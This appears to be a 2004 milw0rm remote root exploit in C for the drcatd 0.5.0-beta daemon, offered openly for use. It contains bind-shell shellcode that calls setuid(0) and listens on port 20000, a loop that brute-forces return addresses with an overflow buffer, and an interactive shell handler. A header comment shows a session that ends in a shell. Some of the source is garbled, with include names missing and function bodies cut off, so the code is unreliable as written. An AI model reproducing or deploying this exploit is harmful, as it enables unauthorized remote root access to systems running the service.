/* Proof of Concept DRCATD Remote exploit by Taif __ Test: [root@localhost drcat]# ./drcat -d 127.0.0.1 -u taif -p test Public code by Taif drcat-0.5.0-beta ('remote r00t' proof) Bug found by Khan Shirani host: +-+-+-+-+-+-+-+ 127.0.0.1 |C|L|U|P|C|S|R| user: |O|O|S|A|O|E|O| taif |O|G|E|S|D|N|O| password: |N|O|R|S|E|D|T| test | | | | | | | | ---------retaddr---+-+-+-+-+-+-+-+ bfefc000 * * * * * * X bfefbfd1 * * * * * * X bfefbfa2 * * * * * * X bfefbf73 * * * * * * X bfefbf44 * * * * * * X bfefbf15 * * * * * * X bfefbee6 * * * * * * X bfefbeb7 * * * * * * X bfefbe88 * * * * * * X bfefbe59 * * * * * * X bfefbe2a * * * * * * X bfefbdfb * * * * * * X bfefbdcc * * * * * * X bfefbd9d * * * * * * X bfefbd6e * * * * * * X bfefbd3f * * * * * * X bfefbd10 * * * * * * X bfefbce1 * * * * * * X bfefbcb2 * * * * * * X bfefbc83 * * * * * * X bfefbc54 * * * * * * X bfefbc25 * * * * * * X bfefbbf6 * * * * * * X bfefbbc7 * * * * * * X bfefbb98 * * * * * * X bfefbb69 * * * * * * X bfefbb3a * * * * * * X bfefbb0b * * * * * * X bfefbadc * * * * * * X bfefbaad * * * * * * X bfefba7e * * * * * * X bfefba4f * * * * * * X bfefba20 * * * * * * X bfefb9f1 * * * * * * X bfefb9c2 * * * * * * X bfefb993 * * * * * * X bfefb964 * * * * * * X bfefb935 * * * * * * X bfefb906 * * * * * * X bfefb8d7 * * * * * * X bfefb8a8 * * * * * * X bfefb879 * * * * * * X bfefb84a * * * * * * X bfefb81b * * * * * * X bfefb7ec * * * * * * X bfefb7bd * * * * * * X bfefb78e * * * * * * X bfefb75f * * * * * * X bfefb730 * * * * * * X bfefb701 * * * * * * X bfefb6d2 * * * * * * X bfefb6a3 * * * * * * X bfefb674 * * * * * * X bfefb645 * * * * * * X bfefb616 * * * * * * X bfefb5e7 * * * * * * X bfefb5b8 * * * * * * X bfefb589 * * * * * * X bfefb55a * * * * * * X bfefb52b * * * * * * X bfefb4fc * * * * * * * * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * Linux localhost.localdomain 2.4.26 #9 P ?ec 2 09:20:29 CEST 2004 i686 athlon i386 GNU/Linux uid=500(taif) gid=500(taif) groups=500(taif) 10:04pm up 1:00, 1 user, load average: 0.42, 0.35, 0.20 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT .... NOTE: Use this on your own risk!! This exploit is unnecessary!! */ #include #include #include #define MAXDATASIZE (1024 * 4) /* Color Pallete ... i love colors;) */ #define YELLOW "\E[33m" #define GREEN "\E[32m" #define RED "\E[31m" #define RESTORE "\E[0m" #define PRINTGREEN(string) \ printf("%s%s%s",GREEN,string,RESTORE); \ fflush(stdout); #define PRINTRED(string) \ printf("%s%s%s",RED,string,RESTORE); \ fflush(stdout); #define PRINTYELLOW(string) \ printf("%s%s%s",YELLOW,string,RESTORE); \ fflush(stdout); /* portbind 20000 (by bighawk) * * +setuid() */ char code[] = "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xor ebx, ebx */ "\xf7\xe3" /* mul ebx */ "\xb0\x66" /* mov al, 102 */ "\x53" /* push ebx */ "\x43" /* inc ebx */ "\x53" /* push ebx */ "\x43" /* inc ebx */ "\x53" /* push ebx */ "\x89\xe1" /* mov ecx, esp */ "\x4b" /* dec ebx */ "\xcd\x80" /* int 80h */ "\x89\xc7" /* mov edi, eax */ "\x52" /* push edx */ "\x66\x68\x4e\x20"/* push word 8270 */ "\x43" /* inc ebx */ "\x66\x53" /* push bx */ "\x89\xe1" /* mov ecx, esp */ "\xb0\xef" /* mov al, 239 */ "\xf6\xd0" /* not al */ "\x50" /* push eax */ "\x51" /* push ecx */ "\x57" /* push edi */ "\x89\xe1" /* mov ecx, esp */ "\xb0\x66" /* mov al, 102 */ "\xcd\x80" /* int 80h */ "\xb0\x66" /* mov al, 102 */ "\x43" /* inc ebx */ "\x43" /* inc ebx */ "\xcd\x80" /* int 80h */ "\x50" /* push eax */ "\x50" /* push eax */ "\x57" /* push edi */ "\x89\xe1" /* mov ecx, esp */ "\x43" /* inc ebx */ "\xb0\x66" /* mov al, 102 */ "\xcd\x80" /* int 80h */ "\x89\xd9" /* mov ecx, ebx */ "\x89\xc3" /* mov ebx, eax */ "\xb0\x3f" /* mov al, 63 */ "\x49" /* dec ecx */ "\xcd\x80" /* int 80h */ "\x41" /* inc ecx */ "\xe2\xf8" /* loop lp */ "\x51" /* push ecx */ "\x68\x6e\x2f\x73\x68"/* push dword 68732f6eh */ "\x68\x2f\x2f\x62\x69"/* push dword 69622f2fh */ "\x89\xe3" /* mov ebx, esp */ "\x51" /* push ecx */ "\x53" /* push ebx */ "\x89\xe1" /* mov ecx, esp */ "\xb0\xf4" /* mov al, 244 */ "\xf6\xd0" /* not al */ "\xcd\x80"; /* int 80h */ void banner() { fprintf(stderr,"Public code by Taif \n" "drcat-0.5.0-beta (\'remote r00t\' proof)\n" "Bug found by Khan Shirani \n\n"); } void usage (char *progname) { int i; fprintf (stderr, "usage: %s arguments \n\n" "-d hostanme (127.0.0.1) \n" "-u user (NULL) \n" "-p password (NULL) \n" "-P port (3535) \n" "-t timeout (1000=1s) (300) \n" "\n", progname); exit (0); } int conn(char *ip,int port) { int sock; struct hostent *host; struct sockaddr_in addr; if((host=gethostbyname(ip))==NULL) { PRINTRED("X\ngethostbyname()\n"); exit(1); } addr.sin_family=AF_INET; addr.sin_port=htons(port); addr.sin_addr=*((struct in_addr *)host->h_addr); memset(&(addr.sin_zero),0,8); if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) { PRINTRED("X\nsocket()\n"); exit(1); } if(connect(sock,(struct sockaddr *)&addr,sizeof(struct sockaddr))==-1) { PRINTRED("X\n"); return(-1);} return(sock); } void login(int sock,char* user,char *pass) { char buffer[1024]; int n; memset(buffer,0,sizeof(buffer)); n=recv(sock, buffer, 6, 0); if(n<0) { PRINTRED("\nrecv()\n"); exit(1); } if(n==6) { if(strcmp(buffer, "drcatd")) {PRINTYELLOW("* ");} else {PRINTGREEN("* ");}; } else {PRINTYELLOW("* ");} if(send(sock, user, strlen(user), 0) == -1) {PRINTRED("\nsend()\n");close(sock);exit(1);} n=recv(sock, buffer, 1, 0); if(buffer[0] == '0') { PRINTRED("X\nINVALID USER\n"); close(sock); exit(1); } else {PRINTGREEN("* ")}; if(send(sock, pass, strlen(pass), 0) == -1) {PRINTRED("send()\n");close(sock);exit(1);} n=recv(sock, buffer, 1, 0); if(buffer[0] == '0') { PRINTRED("X\nINVALID PASSWORD\n"); close(sock); exit(1); } return; } /* change with care */ #define TOP 290 void makec0de(char* haox,unsigned int ret) { int i; memset(haox,0,512); memset(haox,0x90,TOP); for (i=0;i sock )?fileno(stdin):sock ) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd)-2, stdin); write(sock, snd, strlen(snd)); } if (FD_ISSET(sock, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(sock, rcv, sizeof(rcv))) == -1) { printf("FUCK: Error in read\n"); exit(1); } if (!n) { if (!received) { printf("FUCK: failed.\n\n"); return 0; } printf("Connection closed.\n"); exit(1); } received = 1; fputs(rcv, stdout); fflush(stdout); } } } int main(int argc, char *argv[]){ char buff[MAXDATASIZE]; char *host, *user,*pass,c; int sockfd,sockfd2; int port = 3535; int time = 300; int ret=0xc0000000-(MAXDATASIZE*260); host="127.0.0.1"; user=NULL; pass=NULL; banner(); if (argc<2) usage (argv[0]); while((c=getopt(argc,argv,"?hd:u:p:P:t:"))!=-1) { switch(c) { case 't': time=atoi(optarg); break; case 'P': port=atoi(optarg); break; case 'u': user=optarg; break; case 'd': host=optarg; break; case 'p': pass=optarg; break; case '?': case 'h': default: usage (argv[0]); break; } } if (host==NULL) {PRINTRED("Set host!\n");usage (argv[0]);} if (user==NULL) {PRINTRED("Set user!\n");usage (argv[0]);} if (pass==NULL) {PRINTRED("Set password!\n");usage (argv[0]);} printf(" host: +-+-+-+-+-+-+-+\n" "%16s |C|L|U|P|C|S|R|\n" " user: |O|O|S|A|O|E|O|\n" "%16s |O|G|E|S|D|N|O|\n" " password: |N|O|R|S|E|D|T|\n" "%16s | | | | | | | |\n" "---------retaddr---+-+-+-+-+-+-+-+\n" ,host,user,pass);fflush(stdout); while(1) { printf("%16x ",ret);fflush(stdout); sockfd=conn(host,port); if (sockfd<0) {PRINTRED("connect()\n");exit(1);} else PRINTGREEN("* "); login(sockfd,user,pass);PRINTGREEN("* "); makec0de(buff,ret);PRINTGREEN("* "); send_it(sockfd,buff);PRINTGREEN("* "); close(sockfd); usleep(time*1000); sockfd=conn(host,20000); if (!(sockfd<0)) { PRINTGREEN("*\n"); PRINTGREEN("* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *\n"); sh(sockfd); close(sockfd); exit(0); } ret=ret-((TOP-sizeof(code))/4); } exit(0); } // milw0rm.com [2004-07-22]